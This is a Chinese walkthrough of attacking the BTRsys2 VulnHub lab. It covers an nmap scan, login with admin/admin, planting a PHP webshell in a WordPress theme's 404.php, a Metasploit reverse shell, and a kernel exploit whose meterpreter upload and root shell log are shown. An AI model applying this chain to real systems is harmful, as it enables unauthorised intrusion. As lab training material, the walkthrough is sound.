BTRsys2

VulnHub靶机渗透之BTRsys2

1.信息收集 发现主机IP为192.168.65.132

2.nmap端口扫描nmap -T4 -A -v 192.168.65.132

3.访问80端口 进行目录扫描

4.访问robots.txt 发现wordlist

5.login处尝试弱密码登陆 登陆成功（username=admin passwd=admin）

image-20210309233542575.png image-20210309233553818.png

6.Posts处发现文件上传 上传失败

7.appearance处发现editor 可编辑PHP

8.写入一句话木马 访问http://192.168.65.132/wordpress/wp-content/themes/twentyfourteen/404.php 蚁剑连接成功

8.msf反弹shell

9.提权

9.1 查看当前系统信息

9.2查找内核漏洞

9.3 编译上传 提权成功

meterpreter > upload /home/kali/Desktop/exploit
[*] uploading  : /home/kali/Desktop/exploit -> exploit
[*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
[*] uploaded   : /home/kali/Desktop/exploit -> exploit
meterpreter > shell
Process 1286 created.
Channel 3 created.
pwd
/var/www/html/wordpress/wp-content/themes/twentyfourteen
ls -lh
total 832K
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
-rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
-rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
-rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
-rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
-rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
-rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
-rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
-rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
-rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
-rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
-rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
-rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
-rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
chmod 777 exp*
./exp*
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen#